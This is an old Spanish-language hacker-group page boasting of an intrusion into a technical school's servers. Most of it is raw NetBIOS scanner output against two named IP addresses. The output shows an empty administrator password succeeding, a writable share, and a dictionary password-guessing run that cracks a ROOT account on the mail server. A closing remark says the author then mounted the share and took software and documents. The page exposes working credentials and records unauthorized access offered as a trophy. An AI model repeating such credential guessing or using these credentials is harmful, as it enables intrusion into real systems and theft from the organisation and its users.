<html>

<head>
<meta http-equiv="Content-Language" content="es-ar">
<meta name="GENERATOR" content="">
<meta name="ProgId" content="">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Impa&nbsp; colegio t�cnico</title>
</head>

<body text="#00FF00" bgcolor="#000000">

<p><font face="OCR A Extended">Impa&nbsp; colegio t�cnico</font></p>
<p><font face="OCR A Extended">En el server de impa empeze a jugar con el 
netbios hasta que aflojo</font></p>
<p><font face="OCR A Extended">&nbsp;* Checking 196.32.91.226 ...<br>
* Obtained NetBIOS name table:<br>
SERVERMM &lt;00&gt;<br>
IMPATRQ &lt;00&gt;<br>
SERVERMM &lt;03&gt;<br>
SERVERMM &lt;20&gt;<br>
SERVERMM$ &lt;03&gt;<br>
NETSHOWSERVICES &lt;03&gt;<br>
IMPATRQ &lt;1E&gt;<br>
INet~Services &lt;1C&gt;<br>
IS~SERVERMM.... &lt;00&gt;<br>
IMPATRQ &lt;1D&gt;<br>
..__MSBROWSE__. &lt;01&gt;<br>
ADMINISTRADOR &lt;03&gt;<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;&quot;: succeeded<br>
* Obtained share list:<br>
IPC$ IPC remota<br>
D <br>
ADMIN$ Admin remota<br>
C$ Recurso predeterminado<br>
bandeja <br>
* Obtained browse list:<br>
SERVERMM <br>
* Obtained server information:<br>
Server=[SERVERMM] User=[] Workgroup=[IMPATRQ] Domain=[]<br>
* Checking share D: access denied<br>
* Checking share ADMIN$: access denied<br>
* Checking share C$: access denied<br>
* Checking share bandeja: read-write access<br>
* Finished checking 196.32.91.226<br>
<br>
* Checking 196.32.91.227 ...<br>
* Obtained NetBIOS name table:<br>
MAIL &lt;00&gt;<br>
MAIL &lt;20&gt;<br>
IMPATRQ &lt;00&gt;<br>
IMPATRQ &lt;1C&gt;<br>
IMPATRQ &lt;1B&gt;<br>
IMPATRQ &lt;1E&gt;<br>
MAIL &lt;03&gt;<br>
MAIL$ &lt;03&gt;<br>
IMPATRQ &lt;1D&gt;<br>
..__MSBROWSE__. &lt;01&gt;<br>
INet~Services &lt;1C&gt;<br>
IS~MAIL........ &lt;00&gt;<br>
ADMINISTRADOR &lt;03&gt;<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SERVER&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;LOCAL&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SERVERMM&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;IMPATRQ&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SERVERMM$&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;NETSHOWSERVICES&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ADMINISTRADOR&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;SERVER&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;LOCAL&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;MAIL&quot;: failed<br>
* Trying username &quot;ADMINISTRATOR&quot;, password &quot;MAIL$&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SERVER&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;LOCAL&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SERVERMM&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;IMPATRQ&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SERVERMM$&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;NETSHOWSERVICES&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ADMINISTRADOR&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;SERVER&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;LOCAL&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;MAIL&quot;: failed<br>
* Trying username &quot;GUEST&quot;, password &quot;MAIL$&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SERVER&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;LOCAL&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SERVERMM&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;IMPATRQ&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SERVERMM$&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;NETSHOWSERVICES&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ADMINISTRADOR&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;SERVER&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;LOCAL&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;MAIL&quot;: failed<br>
* Trying username &quot;BACKUP&quot;, password &quot;MAIL$&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;ADMINISTRATOR&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;GUEST&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;ROOT&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;ADMIN&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;PASSWORD&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;TEMP&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;SHARE&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;WRITE&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;FULL&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;BOTH&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;READ&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;FILES&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;DEMO&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;TEST&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;ACCESS&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;USER&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;BACKUP&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;SYSTEM&quot;: failed<br>
* Trying username &quot;ROOT&quot;, password &quot;SERVER&quot;: succeeded<br>
&nbsp;</font></p>
<p><font face="OCR A Extended">con net use agregue su recurso compartido 
&quot;bandeja&quot; y habia un monton de programas comerciales y algunos doc que estan en 
la carpeta:</font></p>
<p><font face="OCR A Extended"><a href="../int_impa.aisle">
aisle\chapter3.aisle\int_impa.aisle</a></font></p>
<p><font face="OCR A Extended">Written by gordian_knot from aisle.</font></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><font face="OCR A Extended">&nbsp;</font></p>

</body>

</html>